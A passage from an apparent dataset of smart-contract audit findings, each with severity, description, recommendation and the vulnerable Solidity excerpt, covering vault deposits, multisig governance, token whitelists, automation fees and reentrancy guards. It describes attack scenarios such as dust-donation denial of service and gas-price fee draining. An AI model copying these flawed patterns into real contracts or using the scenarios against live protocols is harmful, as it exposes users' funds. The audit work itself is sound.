passed as targetRatios, and sourceRatios is the current balances. Therefore, an attacker can directly transfer a negligible amount of some vault token to the contract to make the amount the user specified in targetRatios not line up with the expected proportion. As a result, the deposit would revert. 
Essentially it is an abuse of the over-granular verification of ratios, leading to a DOS of any deposit in the mempool.",Loosen the restriction on deposit ratios. A DOS attack should cost an amount that the vault creditors would be happy to live with.,,"```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), ""ratios don't match"");\\n```\\n" +User deposits can fail despite using the correct method for calculation of deposit amounts,medium,"Users can use the `getAmtsNeededForDeposit()` function to get the amount of tokens that maintain the desired proportion for vault deposits. It will perform a calculation very similar to the one in `ratiosMatch()`, which will verify the deposit.\\n```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n\\nHowever, a difference between the verification function and the getter function is that the getter receives any reference token, while the verification will use proportions based on the deposit amount in the largest balance in the vault. Indeed, these fractions may differ by a small amount. This could cause the `getAmtsNeededForDeposit()` function to respond with values which will not be accepted at deposit, since they will be rounded differently.",Calculation amounts needed using the ratio between largest balance and the deposit amount. 
This would line up the numbers as verification would expect.,,"```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n" +Several popular ERC20 tokens are incompatible with the vault due to MAX approve,low,"There are several instances where the vault approves use of funds to the manager or a trade router. It will set approval to MAX_UINT256.\\n```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n\\nThe issue is that there are several popular tokens(https://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers) (UNI, COMP and others) which do not support allowances of above UINT_96. The contract will not be able to interoperate with them.","Consider setting allowance to UINT_96. 
Whenever the allowance is consumed, perform re-approval up to UINT_96.",,"```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n" +Attacker can freeze deposits and withdrawals indefinitely by submitting a bad withdrawal,high,"Users request to queue a withdrawal using the function below in Vault.\\n```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), ""ERROR: Invalid token"");\\n require(_amountMLP != 0, ""ERROR: Invalid amount"");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), ""Withdraw amount > amount MLP"");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n\\nNotice that the function only validates that the user has a sufficient LP token balance to withdraw at the moment of execution. After it is queued up, a user can move their tokens to another wallet. Later in `_settleRequests()`, the Vault will attempt to burn user's tokens:\\n```\\n // Burn moazic LP token.\\n MozaicLP(mozLP).burn(request.user, _mlpToBurn);\\n```\\n\\nThis would revert and block any other settlements from occurring. Therefore, users can block the entire settlement process by requesting a tiny withdrawal amount in every epoch and moving funds to another wallet.","Vault should take custody of user's LP tokens when they request withdrawals. 
If the entire withdrawal cannot be satisfied, it can refund some tokens back to the user.",,"```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), ""ERROR: Invalid token"");\\n require(_amountMLP != 0, ""ERROR: Invalid amount"");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), ""Withdraw amount > amount MLP"");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n" +Removal of Multisig members will corrupt data structures,medium,"The Mozaic Multisig (the senate) can remove council members using the TYPE_DEL_OWNER operation:\\n```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, ""Invalid owner address"");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n\\nThe code finds the owner's index in the councilMembers array, copies all subsequent members downwards, and deletes the last element. Finally, it deletes the isCouncil[_owner] entry. 
The issue is actually in the contains() function.\\n```\\n function contains(address _owner) public view returns (uint) {\\n for (uint i = 1; i <= councilMembers.length; i++) {\\n if (councilMembers[i - 1] == _owner) {\\n return i;\\n }\\n }\\n return 0;\\n }\\n```\\n\\nThe function returns the index following the owner's index. Therefore, the intended owner is not deleted from councilMembers, instead the one after it is. The `submitProposal()` and `confirmTransaction()` privileged functions will not be affected by the bug, as they filter by isCouncil. However, the corruption of councilMembers will make deleting the member following the currently deleted owner fail, as deletion relies on finding the member in councilMembers.",Fix the `contains()` function to return the correct index of _owner,,"```\\n if(proposals[_proposalId].actionType == TYPE_DEL_OWNER) {\\n (address _owner) = abi.decode(proposals[_proposalId].payload, (address));\\n require(contains(_owner) != 0, ""Invalid owner address"");\\n uint index = contains(_owner);\\n for (uint256 i = index; i < councilMembers.length - 1; i++) {\\n councilMembers[i] = councilMembers[i + 1];\\n }\\n councilMembers.pop();\\n proposals[_proposalId].executed = true;\\n isCouncil[_owner] = false;\\n }\\n```\\n" +Attacker could abuse victim's vote to pass their own proposal,medium,"Proposals are created using submitProposal():\\n```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n\\nAfter submission, council members approve them by calling confirmTransaction():\\n```\\n function confirmTransaction(uint256 _proposalId) public onlyCouncil \\n notConfirmed(_proposalId) {\\n confirmations[_proposalId][msg.sender] = true;\\n proposals[_proposalId].confirmation += 1;\\n emit 
Confirmation(_proposalId, msg.sender);\\n }\\n```\\n\\nNotably, the _proposalId passed to `confirmTransaction()` is simply the proposalCount at time of submission. This design allows the following scenario to occur:\\nUser A submits proposal P1\\nUser B is interested in the proposal and confirms it\\nAttacker submits proposal P2\\nA blockchain re-org occurs. Submission of P1 is dropped in place of P2.\\nUser B's confirmation is applied on top of the re-orged blockchain. Attacker gets their vote. We've seen very large re-orgs in top blockchains such as Polygon, so this threat remains a possibility to be aware of.","Calculate proposalId as a hash of the proposal properties. This way, votes cannot be misdirected.",,"```\\n function submitProposal(uint8 _actionType, bytes memory _payload) public onlyCouncil {\\n uint256 proposalId = proposalCount;\\n proposals[proposalId] = Proposal(msg.sender,_actionType, \\n _payload, 0, false);\\n proposalCount += 1;\\n emit ProposalSubmitted(proposalId, msg.sender);\\n }\\n```\\n" +MozToken will have a much larger fixed supply than intended.,medium,"MozToken is planned to be deployed on all supported chains. Its total supply will be 1B. However, its constructor will mint 1B tokens on each deployment.\\n```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(""Mozaic Token"", ""MOZ"", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n","Pass the minted supply as a parameter. 
Only on the main chain, mint 1B tokens.",,"```\\n constructor( address _layerZeroEndpoint, uint8 _sharedDecimals\\n ) OFTV2(""Mozaic Token"", ""MOZ"", _sharedDecimals, _layerZeroEndpoint) {\\n _mint(msg.sender, 1000000000 * 10 ** _sharedDecimals);\\n isAdmin[msg.sender] = true;\\n }\\n```\\n" +Theoretical reentrancy attack when TYPE_MINT_BURN proposals are executed,low,"The senate can pass a proposal to mint or burn tokens.\\n```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n\\nNote that the proposal is only marked as executed at the end of execution, but execution is checked at the start of the function.\\n```\\n function execute(uint256 _proposalId) public onlyCouncil {\\n require(proposals[_proposalId].executed == false, ""Error: \\n Proposal already executed."");\\n require(proposals[_proposalId].confirmation >= threshold, ""Error: Not enough confirmations."");\\n```\\n\\nInteraction with tokens should generally be assumed to grant arbitrary call execution to users. If the mint or `burn()` calls call `execute()` again, the proposal will be executed twice, resulting in double the amount minted or burned. 
Specifically for XMoz, it is not anticipated to yield execution to the to address, so the threat remains theoretical.","Follow the Check-Effects-Interactions design pattern, mark the function as executed at the start.",,"```\\n if(proposals[_proposalId].actionType == TYPE_MINT_BURN) {\\n (address _token, address _to, uint256 _amount, bool _flag) = \\n abi.decode(proposals[_proposalId].payload, (address, address, uint256, bool));\\n if(_flag) {\\n IXMozToken(_token).mint(_amount, _to);\\n } else {\\n IXMozToken(_token).burn(_amount, _to);\\n }\\n proposals[_proposalId].executed = true;\\n }\\n```\\n" +XMozToken permits transfers from non-whitelisted addresses,low,"The XMozToken is documented to forbid transfers except from whitelisted addresses or mints.\\n```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), ""transfer: not allowed"");\\n }\\n```\\n\\nHowever, as can be seen, non-whitelisted users can still transfer tokens, so long as it is to whitelisted destinations.","Remove the additional check in `_beforeTokenTransfer()`, or update the documentation accordingly.",,"```\\n /**\\n * @dev Hook override to forbid transfers except from whitelisted \\n addresses and minting\\n */\\n function _beforeTokenTransfer(address from, address to, uint256 \\n /*amount*/) internal view override {\\n require(from == address(0) || _transferWhitelist.contains(from) \\n || _transferWhitelist.contains(to), ""transfer: not allowed"");\\n }\\n```\\n" +XMozToken cannot be added to its own whitelist,low,"By design, XMozToken should always be in the whitelist. 
However, `updateTransferWhitelist()` implementation forbids both removal and insertion of XMozToken to the whitelist.\\n```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), ""updateTransferWhitelist: \\n Cannot remove xMoz from whitelist"");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n",Move the require statement into the else clause.,,"```\\n function updateTransferWhitelist(address account, bool add) external onlyMultiSigAdmin {\\n require(account != address(this), ""updateTransferWhitelist: \\n Cannot remove xMoz from whitelist"");\\n if(add) _transferWhitelist.add(account);\\n else _transferWhitelist.remove(account);\\n emit SetTransferWhitelist(account, add);\\n }\\n```\\n" +User fee token balance can be drained in a single operation by a malicious bot,high,"In `_buildFeeExecutable()`, BrahRouter calculates the total fee charged to the wallet. It uses tx. 
gas price to get the gas price specified by the bot.\\n```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n",Use a gas oracle or a capped priority fee to ensure an inflated gas price down not harm the user.,,"```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n" +Users can drain Gelato deposit at little cost,high,"In Console automation, fees are collected via the `claimExecutionFees()` modifier:\\n```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 
initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n","When calculating fees in buildFeeExecutable(), there are assumptions about the gas cost of an ERC20 transfer and a native transfer.\\n```\\n // Keeper network overhead -150k\\n uint256 internal constant GAS_OVERHEAD_NATIVE = 150_000 + 40_000;\\n uint256 internal constant GAS_OVERHEAD_ERC20 = 150_000 + 90_000;\\n```\\n\\nA good fix would be to check the actual gas usage and require it to be under the hard cap.Team responseAdded a gas check for this attack.Mitigation reviewApplied fix has been applied.",,"```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n" +Attackers can drain users over time by donating negligible ERC20 
amount,high,"In the Console automation model, a strategy shall keep executing until its trigger check fails. For DCA strategies, the swapping trigger is defined as:\\n```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n","Define a DUST_AMOUNT, below that amount exit is allowed, while above that amount swap execution is allowed. User should only stand to gain from another party donating ERC20 tokens to their account.",,"```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n" +"When FeePayer is subsidizing, users can steal gas",medium,"```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n","The root cause is that the gasUsed amount is subsidized as well as GAS_OVERHEAD_NATIVE, which is the gas reserved for the delivery from Gelato executors. 
By subsidizing only the Gelato gas portion, users will not gain from gas minting attacks, while the intention of improving user experience is maintained.",,"```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n" +Strategy actions could be executed out of order due to lack of reentrancy guard,medium,"The Execute module performs automation of the fetched Executable array on wallet subaccounts.\\n```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n",Add a reentrancy guard for `executeAutomationViaBot()` and `executeTrustedAutomation()`.,,"```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n 
do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n" +Anyone can make creating strategies extremely expensive for the user,medium,"In Console architecture, users can deploy spare subaccounts (Gnosis Safes) so that when they will subscribe to a strategy most of the gas spending would have been spent at a low-gas phase.\\n```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n\\nImpact The issue is that anyone can call the deploy function and specify another user's wallet. While on the surface that sounds like donating gas costs, in practice this functionality can make operating with strategies prohibitively expensive. When users will subscribe to strategies, the StrategyRegistry will request a subaccount using this function:\\n```\\n function requestSubAccount(address _wallet) external returns (address) {\\n if (msg.sender != subscriptionRegistry) \\n revert OnlySubscriptionRegistryCallable();\\n // Try to find a subAccount which already exists\\n address[] memory subAccountList = walletToSubAccountMap[_wallet];\\n```\\n\\nAt this point, the entire subaccount array will be copied from storage to memory. 
Therefore, attackers can fill the array with hundreds of elements at a low-gas time and make creation of strategies very difficult.","Limit the amount of spare subaccount to something reasonable, like 10 Team Response: Removing the spare subaccount deployment Mitigation review: Attack surface has been removed.",,"```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n" +"DCA Strategies build orders that may not be executable, wasting fees",medium,"In `_buildInitiateSwapExecutable()`, DCA strategies determine the swap parameters for the CoW Swap. The code has recently been refactored so that there may be more than one active order simultaneously. The issue is that the function assumes the user's entire ERC20 balance to be available for the order being built.\\n```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n\\nImpact This is a problem because if the previous order will be executed before the current order, there may not be enough funds to pull from the user to execute the swap. As a result, transaction execution fees are wasted.","Ensure only one swap can be in-flight at a time, or deduct the in-flight swap amounts from the current balance.",,"```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? 
\\n inputTokenBalance : params.amountToSwap;\\n```\\n" +User will lose all Console functionality when upgrading their wallet and an upgrade target has not been set up,medium,"Console supports upgrading of the manager wallet using the `upgradeWalletType()` function.\\n```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n\\nNote that upgradablePaths are set by governance. There is a lack of check that the upgradable path is defined before performing the upgrade.\\n```\\n function _setWalletType(address _wallet, uint8 _walletType) private {\\n _walletDataMap[_wallet].walletType = _walletType;\\n }\\n```\\n\\nIf _upgradablePaths[fromWalletType] is zero (uninitialized), the user's wallet type shall become zero too. However, zero is an invalid value, as defined by the isWallet() view function:\\n```\\n function isWallet(address _wallet) public view returns (bool) \\n { WalletData memory walletData = _walletDataMap[_wallet];\\n if (walletData.walletType == 0 || walletData.feeToken == address(0)){\\n return false;\\n }\\n return true;\\n }\\n```\\n\\nImpact As a result, most of the functionality of Console is permanently broken when users upgrade their wallet when an upgrade path isn't set. 
They can salvage their funds if it is a Safe account, as they can still execute on it directly.","When setting a new wallet type, make sure the new type is not zero.",,"```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n" +Rounding error causes an additional iteration of DCA strategies,low,"Both CoW strategies receive an interval and total amountIn of tokens to swap. They calculate the amount per iteration as below:\\n```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n",Change the amount requested from the management wallet to amountIn / iterations * iterations.,,"```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n" +Fee mismatch between contracts can make strategies unusable,low,"In CoW Swap strategies, fee is set in the strategy contracts and then passed to `initiateSwap()`. 
It is built in _buildInitiateSwapExecutable():\\n```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n\\nThere is a mismatch between the constraints around fees between the strategy contracts and the `initiateSwap()` function:\\n```\\n function setSwapFee(uint256 _swapFee) external {\\n _onlyGov();\\n if (_swapFee > 10_000) { revert InvalidSlippage();\\n }\\n swapFee = _swapFee;\\n }\\n if (feeBps > 0) {\\n if (feeBps > 1_000) revert FeeTooHigh();\\n amountIn = amountToSwap * (MAX_BPS - feeBps) / MAX_BPS;\\n```\\n","Enforce the same constraints on the fee percentage in both contracts, or remove the check from one of them as part of a simplified security model.",,"```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n" +Reentrancy protection can likely be bypassed,high,"The KeyManager offers reentrancy protection for interactions with the associated account. Through the LSP20 callbacks or through the `execute()` calls, it will call `_nonReentrantBefore()` before execution, and `_nonReentrantAfter()` post-execution. 
The latter will always reset the flag signaling entry.\\n```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n\\nAn attacker can abuse it to reenter provided that there exists some third-party contract with REENTRANCY_PERMISSION that performs some interaction with the contract. The attacker would trigger the third-party code path, which will clear the reentrancy status, and enable attacker to reenter. This could potentially be chained several times. Breaking the reentrancy assumption would make code that assumes such flows to be impossible to now be vulnerable.","In `_nonReentrantAfter()`, the flag should be returned to the original value before reentry, rather than always setting it to false.",,"```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n" +LSP20 verification library deviates from spec and will accept fail values,medium,"The functions `lsp20VerifyCall()` and `lsp20VerifyCallResult()` are called to validate the owner accepts some account interaction. The specification states they must return a specific 4 byte magic value. 
However, the implementation will accept any byte array that starts with the required magic value.\\n```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n\\nTherefore, implementations of the above functions which intend to signal failure status may be accepted by the verification wrapper above.","Verify that the return data length is 32 bytes (the 4 bytes are extended by the compiler), and that all other bytes are zero.",,"```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? 
true : false;\\n }\\n```\\n" +Deviation from spec will result in dislocation of receiver delegate,medium,"The LSP0 `universalReceiver()` function looks up the receiver delegate by crafting a mapping key type.\\n```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n\\nMapping keys are constructed of a 10-byte prefix, 2 zero bytes and a 20-byte suffix. However, followers of the specification will use an incorrect suffix. The docs do not discuss the trimming of bytes32 into a bytes20 type. The mismatch may cause various harmful scenarios when interacting with the delegate not using the reference implementation.",Document the trimming action in the LSP0 specification.,,"```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n" +KeyManager ERC165 does not support LSP20,medium,"LSP6KeyManager supports LSP20 call verification. 
